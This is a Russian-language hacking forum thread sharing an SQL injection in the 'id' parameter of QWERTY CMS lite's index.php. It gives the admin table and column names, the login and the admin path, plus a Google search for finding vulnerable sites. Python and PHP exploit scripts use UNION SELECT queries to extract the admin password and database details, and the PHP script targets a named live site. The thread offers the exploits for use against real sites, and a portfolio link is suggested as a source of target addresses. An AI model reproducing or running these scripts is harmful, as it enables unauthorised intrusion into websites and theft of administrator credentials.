Нашел уязвимость SQL INJ в одной малоизвестной QWERTY CMS lite. В гугле даже несмог найти авторов сего творения. Уязвимость в файле index.php, уязвимый параметр id: Таблица администратора:rkh8t5po клонки: secret873ktlW pass459khyf Пароль от админки находится в колонке pass459khyf Логин: admin Путь к Админке: /admin/ http://www.milw0rm.com/exploits/8104
http://www.google.ru/search?q=allinurl%3A+php%3Fact%3Dpubl%26id%3D&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:rufficial&client=firefox-a Да уж -) совсем мало популярная..
qwerty cms expl01t Code: #!/usr/bin/python #QWERTY CMS expl01t #http://sql.parsers.info #faza02[at]gmail[dot]com #thx login999 import urllib import re print "qwerty cms expl01t by faza02\n\nexample: site.com" site=raw_input(u'site: ') site1='http://' + site + '/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po' pars=str(urllib.urlopen(site1).read()) title=re.findall(r'\<title\>.*?\<\/title\>',pars) per=str(title)[2:-2] per=per.replace('<title>','') per=per.replace('</title>','') print 'login: admin' print 'passw0rd: ' + per (с) faza02
QWERTY CMS lite PHP Injector by mailbrush QWERTY CMS lite PHP Injector by mailbrush PHP: <? $site="http://dr-gng.dp.ua"; //сайт для инжекта function db($url){ $url=$url."/index.php?act=publ&id=-9+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5"; $fp=file_get_contents($url); list($ds,$f)=explode('<title>',$fp); list($ds,$f)=explode('</title>',$f); return $ds; } function user($url){ $url=$url."/index.php?act=publ&id=-9+union+select+1,concat(0x61646d696e3a,pass459khyf),3,4,5+from+rkh8t5po"; $fp=file_get_contents($url); list($ds,$f)=explode('<title>',$fp); list($ds,$f)=explode('</title>',$f); return $ds; } echo "<b>user():database():version() - </b>".db($site)."<br>"; echo "<b>admin:pass - </b>".user($site)."<br>"; ?>
Это ж все зависит от того, как писать, можно то его и на socket написать , а толку ? Python славится невьебённым количеством модулей, можешь взглянуть здесь : http://docs.python.org/modindex.html , этот код можно было написать на как минимум трех модулях, причем аобсолютно без проблем P.S. Переделал код в духе минимализма : Code: #!/usr/bin/python #QWERTY CMS expl01t #http://sql.parsers.info #faza02[at]gmail[dot]com #thx login999 import urllib, re print "qwerty cms expl01t by faza02\n\nexample: site.com" print 'login: admin & passw0rd: ' + str(re.findall(r'\<title\>.*?\<\/title\>',str(urllib.urlopen("http://" + raw_input(u'site: ') + "/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po").read())))[2:-2].replace("<title>",'').replace("</title>",'') Из 8 строчек кода 4 строчки - цоперайты P.S. Ачат "обезвреживает" спец символы, поэтому в сплоенте после (pass459khyf)) не должно быть 2 пробела, снесите их нафик
Портфолио их групы , там адресочки можно взять, но спосов Assembler то же норм. http://web-sites.kiev.ua/portfolio.php А там реально ип админку отправляется при не праивльном заходе в админку?